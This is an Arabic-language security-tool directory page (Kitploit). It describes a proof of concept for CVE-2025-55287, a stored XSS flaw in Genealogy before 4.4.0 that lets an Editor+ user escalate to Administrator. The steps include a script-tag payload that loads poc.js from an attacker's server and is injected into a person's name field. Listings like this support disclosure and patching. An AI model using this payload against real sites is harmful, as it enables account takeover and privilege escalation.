Skip to content
KitploitKITPLOIT
أدواتالمدونة
إرسال
أدواتالمدونة
إرسال

أدوات الاختراق واختبار الاختراق والأمن السيبراني لترسانتك الأمنية!

Kitploit هو دليل لأدوات الاختراق والأمن السيبراني واختبار الاختراق. اكتشف آخر تحديثات المشاريع للعثور على الثغرات وتحليل الأنظمة وأتمتة الاختبارات وتعزيز أمنك.

··الخلاصات·اتصال·الخصوصية·© 2026 Kitploit

دليل الأدوات

الفئات

عرض جميع الفئات
Loading categories
CVE-2025-55287-POC — إثبات مفهوم (PoC) لثغرة XSS مخزنة بعد المصادقة لتصعيد الامتيازات. تؤثر على إصدارات Genealogy قبل 4.4.0. | Kitploit
أدوات/GitHubGitHub/eternalvalhalla/cve-2025-55287-poc
تصعيد الامتيازاتتحليل الثغرات الأمنيةالاستغلالاستغلال تطبيقات الويبأمن الويباختبار الاختراق
GitHubeternalvalhalla/cve-2025-55287-poc

CVE-2025-55287-POC

إثبات مفهوم (PoC) لثغرة XSS مخزنة بعد المصادقة لتصعيد الامتيازات. تؤثر على إصدارات Genealogy قبل 4.4.0.

الأكثر شعبية

عرض الكل →

اكتشف الأدوات الأكثر استخدامًا من قبل مجتمعنا.

استكشف جميع الأدوات

تصفح مجموعتنا من الأدوات

عرض جميع الأدوات →
مشاركة
عرض المستودع
11منذ سنة واحدةلم تتم المراجعة بعد

CVE-2025-55287-POC

تطبيق Genealogy قبل الإصدار 4.4.0 يعاني من ثغرة البرمجة النصية عبر المواقع المخزّنة (Stored Cross-Site Scripting - XSS) عند تسجيل الدخول، مما يسمح بتنفيذ جافاسكربت عشوائي ورفع الصلاحيات من دور Editor+ إلى Administrator.

الملخص
  • نوع الثغرة: البرمجة النصية عبر المواقع المخزّنة (CWE-79)
  • المكوّن المتأثر: الاسم الأول واسم العائلة في 'Person'.
  • الإصدارات المتأثرة: جميع الإصدارات قبل 4.4.0
  • الأثر: تنفيذ مستمر لجافاسكربت يوفّره المهاجم في متصفحات الضحايا؛ اختطاف الجلسة، CSRF عبر DOM، خداع الواجهة (UI redress)، سرقة بيانات الاعتماد، أو تنفيذ إجراءات تعسفية باسم الضحية.
  • ناقل الهجوم: مستخدم مصادَق عليه (أي دور يمكنه إنشاء شخص جديد - Editor+)
الاستغلال

السبب الجذري: تعقيم/ترميز غير كافٍ من جانب الخادم للاسم الأول واسم العائلة للأشخاص عند نجاح حذف الشخص المتأثر بواسطة مستخدم بصلاحية أعلى.

إثبات المفهوم (PoC):

  1. سجّل الدخول إلى التطبيق (بدور Editor+).
  2. أنشئ شخصًا جديدًا (لا يلزم بالضرورة ربطه بأي عائلة).
  3. أدخل الجافاسكربت إما في الاسم الأول أو اسم العائلة للشخص المضاف: <script src='yourserver/poc.js'></script>
  4. عدّل ملف poc.js وأدخل عنوان بريدك الإلكتروني في العنصر النائب.
  5. بمجرد أن يحاول مستخدم بصلاحية عالية حذف الشخص المضاف حديثًا، ستتلقى دعوة إلى المنصة على عنوان البريد الإلكتروني المقدم بصلاحية Administrator.
تنزيل الأداة